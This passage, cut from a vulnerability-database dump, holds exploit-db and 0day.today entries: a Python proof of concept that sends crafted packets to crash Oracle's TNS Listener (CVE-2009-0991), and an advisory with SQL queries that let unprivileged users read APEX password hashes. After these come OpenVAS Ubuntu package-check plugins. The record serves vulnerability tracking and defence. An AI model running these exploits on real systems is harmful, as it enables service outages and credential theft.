9\\xc0\\xb1\\xc3\\x08\\x1d\"\r\n\t\"\\x46\\x6d\\xb6\\xcf\\xd1\\xdd\\x2c\\xa7\\x66\\x6d\\x0a\\x00\\x00\\x00\\x78\\x2b\"\r\n\t\"\\xbc\\x04\\x7f\\x00\\x00\\x00\\x64\\xa7\\xa2\\x09\\x0d\\x00\\x00\\x00\\x20\\x2c\"\r\n\t\"\\xbc\\x04\\x11\\x00\\x00\\x00\\x95\\x00\\x00\\x00\\x02\\x20\\x00\\x80\\x03\\x00\"\r\n\t\"\\x00\\x00\\x98\\xc5\\x2f\\x22\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0a\\x00\"\r\n\t\"\\x00\\x00\\xb0\\xc3\\xcc\\x07\\x44\\x45\\x44\\x49\\x43\\x41\\x54\\x45\\x44\\x00\"\r\n\t\"\\x28\\x41\\x44\\x44\\x52\\x45\\x53\\x53\\x3d\\x28\\x50\\x52\\x4f\\x54\\x4f\\x43\"\r\n\t\"\\x4f\\x4c\\x3d\\x42\\x45\\x51\\x29\\x28\\x50\\x52\\x4f\\x47\\x52\\x41\\x4d\\x3d\"\r\n\t\"\\x43\\x3a\\x5c\\x61\\x70\\x70\\x5c\\x41\\x64\\x6d\\x69\\x6e\\x69\\x73\\x74\\x72\"\r\n\t\"\\x61\\x74\\x6f\\x72\\x5c\\x70\\x72\\x6f\\x64\\x75\\x63\\x74\\x5c\\x31\\x31\\x2e\"\r\n\t\"\\x31\\x2e\\x30\\x5c\\x64\\x62\\x5f\\x31\\x5c\\x62\\x69\\x6e\\x5c\\x6f\\x72\\x61\"\r\n\t\"\\x63\\x6c\\x65\\x2e\\x65\\x78\\x65\\x29\\x28\\x41\\x52\\x47\\x56\\x30\\x3d\\x6f\"\r\n\t\"\\x72\\x61\\x63\\x6c\\x65\\x6f\\x72\\x63\\x6c\\x29\\x28\\x41\\x52\\x47\\x53\\x3d\"\r\n\t\"\\x27\\x28\\x4c\\x4f\\x43\\x41\\x4c\\x3d\\x4e\\x4f\\x29\\x27\\x29\\x29\\x00\\x4c\"\r\n\t\"\\x4f\\x43\\x41\\x4c\\x20\\x53\\x45\\x52\\x56\\x45\\x52\\x00\\x68\\xc5\\x2f\\x22\"\r\n\t\"\\x34\\xc5\\x2f\\x22\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x84\\xc5\\x2f\\x22\"\r\n\t\"\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\"\\xfc\\xc4\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x00\\x09\\x00\\x00\\x00\\x50\\xc5\\x2f\"\r\n\t\"\\x22\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\"\\x00\\x34\\xc5\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x5f\\x58\\x50\\x54\\x00\"\r\n)\r\n\r\nsockobj.close()\r\n\r\n# milw0rm.com [2009-04-21]\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/8507/"}, {"lastseen": "2016-02-01T04:34:53", "bulletinFamily": 
"exploit", "description": "Oracle APEX 3.2 Unprivileged DB users can see APEX password hashes. CVE-2009-0981. Local exploit for multiple platforms", "modified": "2009-04-16T00:00:00", "published": "2009-04-16T00:00:00", "id": "EDB-ID:8456", "href": "https://www.exploit-db.com/exploits/8456/", "type": "exploitdb", "title": "Oracle APEX 3.2 - Unprivileged DB users can see APEX password hashes", "sourceData": "Unprivileged DB users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981]\n\nName \t\t\tUnprivileged DB users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981]\nSystems Affected \tAPEX 3.0 (optional component of 11.1.0.7 installation)\nSeverity \t\tHigh Risk\nCategory \t\tPassword Disclosure\nVendor URL \t\thttp://www.oracle.com/\nAuthor \t\t\tAlexander Kornbrust (ak at red-database-security.com)\nCVE \t\t\tCVE-2009-0981\nAdvisory \t\t14 April 2009 (V 1.00)\n\n\nDetails\nUnprivileged database users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER.\nTested on 11.1.0.7.\n\nC:\\> sqlplus dummy/dummy\nConnected to:\nOracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production\nWith the Partitioning, OLAP, Data Mining and Real Application Testing options\n\nSQL> select granted_role from user_role_privs;\n\nGRANTED_ROLE\n------------------------------\nCONNECT\n\n\nSQL> select owner,table_name from all_tables where owner='FLOWS_030000';\n\nOWNER TABLE_NAME\n------------------------------ ------------------------------\nFLOWS_030000 WWV_FLOW_DUAL100\nFLOWS_030000 WWV_FLOW_LOV_TEMP\nFLOWS_030000 WWV_FLOW_TEMP_TABLE\n\n\n\nGet a list of all columns containing the string \"%PASSWORD%\"\n\nSQL> select owner||'.'||table_name||'.'||column_name from all_tab_columns where column_name like '%PASSWORD%' and owner like 
'%FLOWS_0300%';\n\nOWNER||'.'||TABLE_NAME||'.'||COLUMN_NAME\n--------------------------------------------------------------------------------\nFLOWS_030000.WWV_FLOW_USERS.CHANGE_PASSWORD_ON_FIRST_USE\nFLOWS_030000.WWV_FLOW_USERS.FIRST_PASSWORD_USE_OCCURRED\nFLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD_RAW\nFLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD2\nFLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD\nFLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_DAYS\nFLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_ACCESSES\nFLOWS_030000.WWV_FLOW_USERS.PASSWORD_ACCESSES_LEFT\nFLOWS_030000.WWV_FLOW_USERS.PASSWORD_DATE\n\n9 rows selected.\n\n\nSQL> select user_name,web_password2 from FLOWS_030000.WWV_FLOW_USERS\n\nUSER_NAME WEB_PASSWORD2\n--------------------------------------------------------------------------------\nYURI 141FA790354FB6C72802FDEA86353F31\n\nThis password hash can be checked using a tool like Repscan.\n\n\nPatch Information\nApply the patches for Oracle CPU April 2009.\n\n\nHistory\n13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981]\n14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981]\n14-apr-2009 Advisory published\n\n# milw0rm.com [2009-04-16]\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/8456/"}], "zdt": [{"lastseen": "2018-02-19T15:26:34", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category dos / poc", "modified": "2009-04-21T00:00:00", "published": "2009-04-21T00:00:00", "id": "1337DAY-ID-6836", "href": "https://0day.today/exploit/description/6836", "type": "zdt", "title": "Oracle RDBMS 10.2.0.3/11.1.0.6 TNS Listener PoC (CVE-2009-0991)", "sourceData": "===============================================================\r\nOracle RDBMS 10.2.0.3/11.1.0.6 TNS Listener PoC (CVE-2009-0991)\r\n===============================================================\r\n\r\n\r\n\r\n# TNS Listener (Oracle RDBMS) exploit, cause trap in 
Listener process \r\n# (more precisely: in function memcpy() called from ncrfintn() function which is located in oranro11.dll)\r\n\r\n# Successfully working with Oracle RDBMS Win32 11.1.0.6.0 and Oracle RDBMS Win32 10.2.0.3 with latest CPU patches applied\r\n\r\n# Vulnerability discovered by Dennis Yurichev \r\n\r\n# Fixed in CPUapr2009, CVE-2009-0991\r\n\r\nfrom sys import *\r\nfrom socket import *\r\n\r\nsockobj = socket(AF_INET, SOCK_STREAM)\r\n\r\nsockobj.connect ((argv[1], 1521))\r\n\r\nsockobj.send(\r\n\t\"\\x00\\x68\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x3A\\x01\\x2C\\x00\\x00\\x20\\x00\"\r\n\t\"\\x7F\\xFF\\xC6\\x0E\\x00\\x00\\x01\\x00\\x00\\x2E\\x00\\x3A\\x00\\x00\\x00\\x00\"\r\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x28\\x43\\x4F\\x4E\\x4E\\x45\"\r\n\t\"\\x43\\x54\\x5F\\x44\\x41\\x54\\x41\\x3D\\x28\\x43\\x4F\\x4D\\x4D\\x41\\x4E\\x44\"\r\n\t\"\\x3D\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x5F\\x72\\x65\\x67\\x69\\x73\\x74\\x65\"\r\n\t\"\\x72\\x5F\\x4E\\x53\\x47\\x52\\x29\\x29\")\r\n\r\ndata=sockobj.recv(102400)\r\n\r\nsockobj.send(\r\n\t\"\\x02\\xde\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\xd4\\x20\\x08\"\r\n\t\"\\xff\\x03\\x01\\x00\\x12\\x34\\x34\\x34\\x34\\x34\\x78\\x10\\x10\\x32\\x10\\x32\"\r\n\t\"\\x10\\x32\\x10\\x32\\x10\\x32\\x54\\x76\\x00\\x78\\x10\\x32\\x54\\x76\\x44\\x00\"\r\n\t\"\\x00\\x80\\x02\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x70\\xe4\\xa5\\x09\\x90\\x00\"\r\n\t\"\\x23\\x00\\x00\\x00\\x42\\x45\\x43\\x37\\x36\\x43\\x32\\x43\\x43\\x31\\x33\\x36\"\r\n\t\"\\x2d\\x35\\x46\\x39\\x46\\x2d\\x45\\x30\\x33\\x34\\x2d\\x30\\x30\\x30\\x33\\x42\"\r\n\t\"\\x41\\x31\\x33\\x37\\x34\\x42\\x33\\x03\\x00\\x65\\x00\\x01\\x00\\x01\\x00\\x00\"\r\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x64\\x02\\x00\\x80\\x05\\x00\\x00\\x00\\x00\\x04\"\r\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x02\\x00\"\r\n\t\"\\x00\\x00\\x84\\xc3\\xcc\\
x07\\x01\\x00\\x00\\x00\\x84\\x2f\\xa6\\x09\\x00\\x00\"\r\n\t\"\\x00\\x00\\x44\\xa5\\xa2\\x09\\x25\\x98\\x18\\xe9\\x28\\x50\\x4f\\x28\\xbb\\xac\"\r\n\t\"\\x15\\x56\\x8e\\x68\\x1d\\x6d\\x05\\x00\\x00\\x00\\xfc\\xa9\\x36\\x22\\x0f\\x00\"\r\n\t\"\\x00\\x00\\x60\\x30\\xa6\\x09\\x0a\\x00\\x00\\x00\\x64\\x00\\x00\\x00\\x00\\x00\"\r\n\t\"\\x00\\x00\\xaa\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x17\\x00\\x00\\x00\\x78\\xc3\"\r\n\t\"\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x00\\x28\\x48\\x4f\\x53\\x54\\x3d\\x77\\x69\\x6e\"\r\n\t\"\\x32\\x30\\x30\\x33\\x29\\x00\\x01\\x00\\x00\\x00\\x09\\x00\\x00\\x00\\x01\\x00\"\r\n\t\"\\x00\\x00\\x50\\xc5\\x2f\\x22\\x02\\x00\\x00\\x00\\x34\\xc5\\x2f\\x22\\x00\\x00\"\r\n\t\"\\x00\\x00\\x9c\\xc5\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x5f\\x58\\x50\\x54\\x00\\x09\"\r\n\t\"\\x00\\x00\\x00\\x50\\xc5\\x2f\\x22\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x34\\xc5\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x5f\"\r\n\t\"\\x58\\x50\\x54\\x00\\x01\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x01\\x00\\x00\\x00\"\r\n\t\"\\x84\\xc5\\x2f\\x22\\x02\\x00\\x00\\x00\\x68\\xc5\\x2f\\x22\\x00\\x00\\x00\\x00\"\r\n\t\"\\xa4\\xa5\\xa2\\x09\\x6f\\x72\\x63\\x6c\\x00\\x05\\x00\\x00\\x00\\x84\\xc5\\x2f\"\r\n\t\"\\x22\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\"\\x00\\xfc\\xc4\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x00\\x01\\x00\\x00\\x00\\x10\\x00\"\r\n\t\"\\x00\\x00\\x02\\x00\\x00\\x00\\xbc\\xc3\\xcc\\x07\\x00\\x00\\x00\\x00\\xb0\\x2f\"\r\n\t\"\\xa6\\x09\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x89\\xc0\\xb1\\xc3\\x08\\x1d\"\r\n\t\"\\x46\\x6d\\xb6\\xcf\\xd1\\xdd\\x2c\\xa7\\x66\\x6d\\x0a\\x00\\x00\\x00\\x78\\x2b\"\r\n\t\"\\xbc\\x04\\x7f\\x00\\x00\\x00\\x64\\xa7\\xa2\\x09\\x0d\\x00\\x00\\x00\\x20\\x2c\"\r\n\t\"\\xbc\\x04\\x11\\x00\\x00\\x00\\x95\\x00\\x00\\x00\\x02\\x20\\x00\\x80\\x03\\x00\"\r\n\t\"\\x00\\x00\\x98\\xc5\\x2f\\x22\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0a\\x00\"\r\n\t\"\\x00\\x00\\xb0\\xc3\\xcc\\x07\\x44\\x45\\x44\\
x49\\x43\\x41\\x54\\x45\\x44\\x00\"\r\n\t\"\\x28\\x41\\x44\\x44\\x52\\x45\\x53\\x53\\x3d\\x28\\x50\\x52\\x4f\\x54\\x4f\\x43\"\r\n\t\"\\x4f\\x4c\\x3d\\x42\\x45\\x51\\x29\\x28\\x50\\x52\\x4f\\x47\\x52\\x41\\x4d\\x3d\"\r\n\t\"\\x43\\x3a\\x5c\\x61\\x70\\x70\\x5c\\x41\\x64\\x6d\\x69\\x6e\\x69\\x73\\x74\\x72\"\r\n\t\"\\x61\\x74\\x6f\\x72\\x5c\\x70\\x72\\x6f\\x64\\x75\\x63\\x74\\x5c\\x31\\x31\\x2e\"\r\n\t\"\\x31\\x2e\\x30\\x5c\\x64\\x62\\x5f\\x31\\x5c\\x62\\x69\\x6e\\x5c\\x6f\\x72\\x61\"\r\n\t\"\\x63\\x6c\\x65\\x2e\\x65\\x78\\x65\\x29\\x28\\x41\\x52\\x47\\x56\\x30\\x3d\\x6f\"\r\n\t\"\\x72\\x61\\x63\\x6c\\x65\\x6f\\x72\\x63\\x6c\\x29\\x28\\x41\\x52\\x47\\x53\\x3d\"\r\n\t\"\\x27\\x28\\x4c\\x4f\\x43\\x41\\x4c\\x3d\\x4e\\x4f\\x29\\x27\\x29\\x29\\x00\\x4c\"\r\n\t\"\\x4f\\x43\\x41\\x4c\\x20\\x53\\x45\\x52\\x56\\x45\\x52\\x00\\x68\\xc5\\x2f\\x22\"\r\n\t\"\\x34\\xc5\\x2f\\x22\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x84\\xc5\\x2f\\x22\"\r\n\t\"\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\"\\xfc\\xc4\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x00\\x09\\x00\\x00\\x00\\x50\\xc5\\x2f\"\r\n\t\"\\x22\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\"\\x00\\x34\\xc5\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x5f\\x58\\x50\\x54\\x00\"\r\n)\r\n\r\nsockobj.close()\r\n\r\n\r\n\n# 0day.today [2018-02-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/6836"}], "openvas": [{"lastseen": "2017-12-04T11:29:09", "bulletinFamily": "scanner", "description": "The remote host is missing an update to gs-gpl\nannounced via advisory USN-757-1.", "modified": "2017-12-01T00:00:00", "published": "2009-04-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=63856", "id": "OPENVAS:63856", "title": "Ubuntu USN-757-1 (gs-gpl)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: ubuntu_757_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# $Id: ubuntu_757_1.nasl 7969 2017-12-01 09:23:16Z santu 
$\n# Description: Auto-generated from advisory USN-757-1 (gs-gpl)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"The problem can be corrected by upgrading your system to the\n following package versions:\n\nUbuntu 6.06 LTS:\n gs-esp 8.15.2.dfsg.0ubuntu1-0ubuntu1.2\n gs-gpl 8.15-4ubuntu3.3\n\nUbuntu 8.04 LTS:\n libgs8 8.61.dfsg.1-1ubuntu3.2\n\nUbuntu 8.10:\n libgs8 8.63.dfsg.1-0ubuntu6.4\n\nIn general, a standard system upgrade is sufficient to effect the\nnecessary changes.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=USN-757-1\";\n\ntag_insight = \"It was discovered that Ghostscript contained a buffer underflow in its\nCCITTFax decoding filter. If a user or automated system were tricked into\nopening a crafted PDF file, an attacker could cause a denial of service or\nexecute arbitrary code with privileges of the user invoking the program.\n(CVE-2007-6725)\n\nIt was discovered that Ghostscript contained a buffer overflow in the\nBaseFont writer module. 
If a user or automated system were tricked into\nopening a crafted Postscript file, an attacker could cause a denial of\nservice or execute arbitrary code with privileges of the user invoking the\nprogram. (CVE-2008-6679)\n\nIt was discovered that Ghostscript contained additional integer overflows\nin its ICC color management library. If a user or automated system were\ntricked into opening a crafted Postscript or PDF file, an attacker could\ncause a denial of service or execute arbitrary code with privileges of the\nuser invoking the program. (CVE-2009-0792)\n\nAlin Rad Pop discovered that Ghostscript contained a buffer overflow in the\njbig2dec library. If a user or automated system were tricked into opening a\ncrafted PDF file, an attacker could cause a denial of service or execute\narbitrary code with privileges of the user invoking the program.\n(CVE-2009-0196)\n\nUSN-743-1 provided updated ghostscript and gs-gpl packages to fix two\nsecurity vulnerabilities. This update corrects the same vulnerabilities in\nthe gs-esp package.\n\nOriginal advisory details:\n It was discovered that Ghostscript contained multiple integer overflows in\n its ICC color management library. If a user or automated system were\n tricked into opening a crafted Postscript file, an attacker could cause a\n denial of service or execute arbitrary code with privileges of the user\n invoking the program. (CVE-2009-0583)\n\n It was discovered that Ghostscript did not properly perform bounds\n checking in its ICC color management library. If a user or automated\n system were tricked into opening a crafted Postscript file, an attacker\n could cause a denial of service or execute arbitrary code with privileges\n of the user invoking the program. 
(CVE-2009-0584)\";\ntag_summary = \"The remote host is missing an update to gs-gpl\nannounced via advisory USN-757-1.\";\n\n \n\n\nif(description)\n{\n script_id(63856);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-20 23:45:17 +0200 (Mon, 20 Apr 2009)\");\n script_cve_id(\"CVE-2008-5259\", \"CVE-2009-0584\", \"CVE-2009-0583\", \"CVE-2009-1012\", \"CVE-2007-6725\", \"CVE-2009-1016\", \"CVE-2009-1185\", \"CVE-2009-0796\", \"CVE-2009-0792\", \"CVE-2009-0196\", \"CVE-2008-6679\", \"CVE-2009-1186\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu USN-757-1 (gs-gpl)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-757-1/\");\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"gs\", ver:\"8.15-4ubuntu3.3\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-esp\", ver:\"8.15.2.dfsg.0ubuntu1-0ubuntu1.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-gpl\", ver:\"8.15-4ubuntu3.3\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ghostscript-doc\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-gpl\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgs-esp-dev\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-aladdin\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-common\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-esp-x\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-esp\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) 
{\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ghostscript-x\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ghostscript\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgs-dev\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgs8\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ghostscript-doc\", ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-common\", ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-gpl\", ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs\", ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgs-esp-dev\", ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-aladdin\", ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-esp-x\", ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-esp\", ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ghostscript-x\", ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ghostscript\", ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgs-dev\", ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgs8\", 
ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"udev\", ver:\"079-0ubuntu35.1\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvolume-id-dev\", ver:\"113-0ubuntu17.2\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvolume-id0\", ver:\"113-0ubuntu17.2\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"udev\", ver:\"113-0ubuntu17.2\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"volumeid\", ver:\"113-0ubuntu17.2\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvolume-id-dev\", ver:\"117-8ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvolume-id0\", ver:\"117-8ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"udev\", ver:\"117-8ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvolume-id-dev\", ver:\"124-9ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvolume-id0\", ver:\"124-9ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"udev\", ver:\"124-9ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:30:12", "bulletinFamily": "scanner", "description": "The remote host is missing an update to kvm\nannounced via advisory USN-776-2.", "modified": "2017-12-01T00:00:00", "published": "2009-06-05T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=64175", "id": "OPENVAS:64175", "title": "Ubuntu USN-776-2 (kvm)", "type": 
"openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: ubuntu_776_2.nasl 7969 2017-12-01 09:23:16Z santu $\n# $Id: ubuntu_776_2.nasl 7969 2017-12-01 09:23:16Z santu $\n# Description: Auto-generated from advisory USN-776-2 (kvm)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# 